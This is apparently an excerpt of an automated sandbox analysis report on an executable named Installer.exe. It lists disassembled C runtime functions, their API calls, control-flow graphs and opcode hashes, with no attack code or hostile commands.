                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00252E08
                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00252E33
                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00252E88
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                        • String ID: csm
                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                        • Opcode ID: cf0885cf6480081513c37be836aac5343b935644ac4467d7cc92ac93c71f689b
                                                                                                                                        • Instruction ID: 5778081fcb0b63d654a06ef8883a674276636f3f33c2062b0a9686b3e6e1170e
                                                                                                                                        • Opcode Fuzzy Hash: cf0885cf6480081513c37be836aac5343b935644ac4467d7cc92ac93c71f689b
                                                                                                                                        • Instruction Fuzzy Hash: D0411730A20209EBCF14EF68C845AAEBBB5AF06315F148195EC145B3D2D771AD6DCF94

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 578 2579cd-2579d9 579 257a80-257a83 578->579 580 2579de-2579ef 579->580 581 257a89 579->581 583 2579f1-2579f4 580->583 584 2579fc-257a15 LoadLibraryExW 580->584 582 257a8b-257a8f 581->582 585 257a7d 583->585 586 2579fa 583->586 587 257a67-257a70 584->587 588 257a17-257a20 GetLastError 584->588 585->579 589 257a79-257a7b 586->589 587->589 592 257a72-257a73 FreeLibrary 587->592 590 257a57 588->590 591 257a22-257a34 call 257808 588->591 589->585 593 257a90-257a92 589->593 595 257a59-257a5b 590->595 591->590 598 257a36-257a48 call 257808 591->598 592->589 593->582 595->587 597 257a5d-257a65 595->597 597->585 598->590 601 257a4a-257a55 LoadLibraryExW 598->601 601->595
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                        • API String ID: 0-537541572
                                                                                                                                        • Opcode ID: dba9cb8322710f016b6f45851bfca5758d8f5bf3ce4245ddf58f5a764ba744eb
                                                                                                                                        • Instruction ID: 7b68fc39bfe2747e63a97b1e7a8094a3ef16d77a2da0198a171cbf87bc94c55b
                                                                                                                                        • Opcode Fuzzy Hash: dba9cb8322710f016b6f45851bfca5758d8f5bf3ce4245ddf58f5a764ba744eb
                                                                                                                                        • Instruction Fuzzy Hash: 6521DD71AB9222BFCB229F64BC48B2E37549F01762F254111ED45B7291D7B0DE28C5E4

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 602 25b9a2-25b9ad 603 25ba83-25ba85 602->603 604 25b9b3-25ba80 call 25b96a * 5 call 25792b * 3 call 25b96a * 5 call 25792b * 4 602->604 604->603
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0025B96A: _free.LIBCMT ref: 0025B98F
                                                                                                                                        • _free.LIBCMT ref: 0025B9F0
                                                                                                                                          • Part of subcall function 0025792B: HeapFree.KERNEL32(00000000,00000000,?,0025B994,00251093,00000000,00251093,?,?,0025B9BB,00251093,00000007,00251093,?,0025BDE1,00251093), ref: 00257941
                                                                                                                                          • Part of subcall function 0025792B: GetLastError.KERNEL32(00251093,?,0025B994,00251093,00000000,00251093,?,?,0025B9BB,00251093,00000007,00251093,?,0025BDE1,00251093,00251093), ref: 00257953
                                                                                                                                        • _free.LIBCMT ref: 0025B9FB
                                                                                                                                        • _free.LIBCMT ref: 0025BA06
                                                                                                                                        • _free.LIBCMT ref: 0025BA5A
                                                                                                                                        • _free.LIBCMT ref: 0025BA65
                                                                                                                                        • _free.LIBCMT ref: 0025BA70
                                                                                                                                        • _free.LIBCMT ref: 0025BA7B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: fa0ff8bdfd75e9069da2842dc4a1288be894966d68de57e2a28b366a51346e84
                                                                                                                                        • Instruction ID: aa05afbe10f6c4b1c819077cbf0c8c2b80b69e5e3b4aa91d1e491eccb19f2669
                                                                                                                                        • Opcode Fuzzy Hash: fa0ff8bdfd75e9069da2842dc4a1288be894966d68de57e2a28b366a51346e84
                                                                                                                                        • Instruction Fuzzy Hash: F9114F72560B44AAD621BBB1CC07FCB77DCAF04702F400C15BB9D76062DB75B9284E55
                                                                                                                                        APIs
                                                                                                                                        • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 0025CC5B
                                                                                                                                        • __fassign.LIBCMT ref: 0025CE40
                                                                                                                                        • __fassign.LIBCMT ref: 0025CE5D
                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0025CEA5
                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0025CEE5
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0025CF8D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1735259414-0
                                                                                                                                        • Opcode ID: 0a1267f036f58594a0c91829ceb5589eb65c099535804d28e21ec97c321b9e7d
                                                                                                                                        • Instruction ID: be69cb7053023d7f583f55cfbe9ec7e11ce0031f50c7c1af9296f55f08af3811
                                                                                                                                        • Opcode Fuzzy Hash: 0a1267f036f58594a0c91829ceb5589eb65c099535804d28e21ec97c321b9e7d
                                                                                                                                        • Instruction Fuzzy Hash: E1C1ACB1D102599FCF14CFA8D8809EDBBB5AF08315F28816AE855FB341E2319D5ACF64
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,0025308B,00252C7A,002522B2), ref: 002530A2
                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002530B0
                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002530C9
                                                                                                                                        • SetLastError.KERNEL32(00000000,0025308B,00252C7A,002522B2), ref: 0025311B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                        • Opcode ID: 46c7cb66a6c6620e53287f97884534a7d71e3eb13f6acfce3c9c4908929cfbec
                                                                                                                                        • Instruction ID: 7e3ddb9bc6266844f77d912877ddb04ae080db63e5effb68a7be5afb98e1926b
                                                                                                                                        • Opcode Fuzzy Hash: 46c7cb66a6c6620e53287f97884534a7d71e3eb13f6acfce3c9c4908929cfbec
                                                                                                                                        • Instruction Fuzzy Hash: 9801283223C722AEA6247B747C8A6762BD4EB013BB7304229FD14850E1EFB14D68550C
                                                                                                                                        Strings
                                                                                                                                        • C:\Users\user\AppData\Local\Temp\main\Installer.exe, xrefs: 0025A5E3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\main\Installer.exe
                                                                                                                                        • API String ID: 0-2101772373
                                                                                                                                        • Opcode ID: eba7a15645373a261122418d7bd978e8fbf2eb95f6438bfc9ed02d9435165ef0
                                                                                                                                        • Instruction ID: aef48b62bcfecb40efaeef6a9d19f628be3866df3197c3bfdc1ca2f3be2937c7
                                                                                                                                        • Opcode Fuzzy Hash: eba7a15645373a261122418d7bd978e8fbf2eb95f6438bfc9ed02d9435165ef0
                                                                                                                                        • Instruction Fuzzy Hash: BA21D071620206AF9F20AF65EC86D2A77ADAF403667188714FD2696150D730DC688BAA
                                                                                                                                        APIs
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,002541C3,?,?,0026CE00,00000000,?,002542EE,00000004,InitializeCriticalSectionEx,00264CB4,InitializeCriticalSectionEx,00000000), ref: 00254192
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                        • String ID: api-ms-
                                                                                                                                        • API String ID: 3664257935-2084034818
                                                                                                                                        • Opcode ID: 9c9e15fe3bf70a6d552bbcbd987032fbad08531667ecd863d96dad721338c8dc
                                                                                                                                        • Instruction ID: ef9864a673c652c7a08ea898665d3ea68d8d0f166caecb560de3b71f2a9cca3f
                                                                                                                                        • Opcode Fuzzy Hash: 9c9e15fe3bf70a6d552bbcbd987032fbad08531667ecd863d96dad721338c8dc
                                                                                                                                        • Instruction Fuzzy Hash: A5112C31A70A31BBCB227F68AC48B59B3949F117B6F158111FE08E7280D7B0EDD486D8
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00256B8B,?,?,00256B53,?,?,?), ref: 00256BAB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00256BBE
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00256B8B,?,?,00256B53,?,?,?), ref: 00256BE1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                        • Opcode ID: 75acd5ac1d609637dbb1ece164a7468299032c955511faa55d7901da09ef162a
                                                                                                                                        • Instruction ID: e1da50caafeb698bbcdd423d850563da283a545d201150f998238260d0c9ebcf
                                                                                                                                        • Opcode Fuzzy Hash: 75acd5ac1d609637dbb1ece164a7468299032c955511faa55d7901da09ef162a
                                                                                                                                        • Instruction Fuzzy Hash: E4F08231510129FBDB11AF90EC0DF9DBA75EB0175AF404060F944F7060CBB08E55DB94
                                                                                                                                        APIs
                                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0025FAAF,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 0025F896
                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 0025F94C
                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 0025F9E2
                                                                                                                                        • __freea.LIBCMT ref: 0025FA4D
                                                                                                                                        • __freea.LIBCMT ref: 0025FA59
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __alloca_probe_16__freea$Info
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2330168043-0
                                                                                                                                        • Opcode ID: 085477afb27301cd0200d3f06fc9398948230eebc35cbe2f526dc8d889bc9d10
                                                                                                                                        • Instruction ID: f39a1de4807bd14da754821339f7aa6ab44a254c8d7bb0247129bf0f56709e96
                                                                                                                                        • Opcode Fuzzy Hash: 085477afb27301cd0200d3f06fc9398948230eebc35cbe2f526dc8d889bc9d10
                                                                                                                                        • Instruction Fuzzy Hash: 3E81E632D2024AAFDF609E948A45FEE7BB99F09316F180075ED04E7241D731CD68CBA9
                                                                                                                                        APIs
                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002601E8
                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002602AE
                                                                                                                                        • __freea.LIBCMT ref: 0026031A
                                                                                                                                          • Part of subcall function 00258380: HeapAlloc.KERNEL32(00000000,?,00269C50,?,00251D51,?,?,00251093,0000077E), ref: 002583B2
                                                                                                                                        • __freea.LIBCMT ref: 00260323
                                                                                                                                        • __freea.LIBCMT ref: 00260346
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1096550386-0
                                                                                                                                        • Opcode ID: b25347413fbb7f43bced529921e0812cf5c910eeec6b4887f234f1fd4d631a1b
                                                                                                                                        • Instruction ID: 15f3d8654d07c82801a178bc01d579215cb8c21a3cc403202173b4810bc88030
                                                                                                                                        • Opcode Fuzzy Hash: b25347413fbb7f43bced529921e0812cf5c910eeec6b4887f234f1fd4d631a1b
                                                                                                                                        • Instruction Fuzzy Hash: E951E27252021BAFEB219F50CCC5EBB36A9DF84751F2501A9FD04A7240E770DCB0AAA0
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 0025B919
                                                                                                                                          • Part of subcall function 0025792B: HeapFree.KERNEL32(00000000,00000000,?,0025B994,00251093,00000000,00251093,?,?,0025B9BB,00251093,00000007,00251093,?,0025BDE1,00251093), ref: 00257941
                                                                                                                                          • Part of subcall function 0025792B: GetLastError.KERNEL32(00251093,?,0025B994,00251093,00000000,00251093,?,?,0025B9BB,00251093,00000007,00251093,?,0025BDE1,00251093,00251093), ref: 00257953
                                                                                                                                        • _free.LIBCMT ref: 0025B92B
                                                                                                                                        • _free.LIBCMT ref: 0025B93D
                                                                                                                                        • _free.LIBCMT ref: 0025B94F
                                                                                                                                        • _free.LIBCMT ref: 0025B961
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: 9086b47bd364397075c0c250e2980793992d8f766743e1bd60faa9e8557647f5
                                                                                                                                        • Instruction ID: 460460e34698ba2f46c7b92e767416e54ee2411a1f3aad085e6838e0fa38557c
                                                                                                                                        • Opcode Fuzzy Hash: 9086b47bd364397075c0c250e2980793992d8f766743e1bd60faa9e8557647f5
                                                                                                                                        • Instruction Fuzzy Hash: E4F06232528201A7CB22FF65F4C9C2AB3DDEA04B117645805F988D7511DB34FCA48E68
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID: *?
                                                                                                                                        • API String ID: 269201875-2564092906
                                                                                                                                        • Opcode ID: 2eb5b181120e30053beeecc278298ef2eb23a3d1244a4b43fa3aa6fe6398e091
                                                                                                                                        • Instruction ID: 045308bd8caa4cc6bf61c82c2014cb5cefdec06017e91cc2f4278c02775ca303
                                                                                                                                        • Opcode Fuzzy Hash: 2eb5b181120e30053beeecc278298ef2eb23a3d1244a4b43fa3aa6fe6398e091
                                                                                                                                        • Instruction Fuzzy Hash: 26615E75E2021A9FCB14DFA8C8825EDFBF5EF48310B248269EC15E7340D671AE558B94
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strrchr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                        • Opcode ID: ea55d751711c61dd11250f731b0c3facead35ba88ce65982557f2db5320d6c9d
                                                                                                                                        • Instruction ID: 4f4042a8b2acb62cb6a04f5f8aa19ce5cd87f60553daa3b0231abdc4b0a2dd23
                                                                                                                                        • Opcode Fuzzy Hash: ea55d751711c61dd11250f731b0c3facead35ba88ce65982557f2db5320d6c9d
                                                                                                                                        • Instruction Fuzzy Hash: 0BB15732924256EFDB118F28C8417EEBBF5EF55311F2481A9EC45EB281D2348D99CB68
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                        • Opcode ID: 4ff8887b5a45d6f27fb6c4e0fa199ff6e9be88cff2748abaa47636e5ffc16b21
                                                                                                                                        • Instruction ID: 177871fb4b0746f8a1609d637dcfe25f3e6acd3ba96a7cd7cb0b07958ccc93b1
                                                                                                                                        • Opcode Fuzzy Hash: 4ff8887b5a45d6f27fb6c4e0fa199ff6e9be88cff2748abaa47636e5ffc16b21
                                                                                                                                        • Instruction Fuzzy Hash: 5351E472620A02AFEB28CF54D841B6AB7A4FF04392F14416DED05C7191D771EEA8DB98
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0025A498: _free.LIBCMT ref: 0025A4A6
                                                                                                                                          • Part of subcall function 0025B053: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00260310,?,00000000,00000000), ref: 0025B0FF
                                                                                                                                        • GetLastError.KERNEL32 ref: 00259EDE
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00259EE5
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00259F24
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00259F2B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
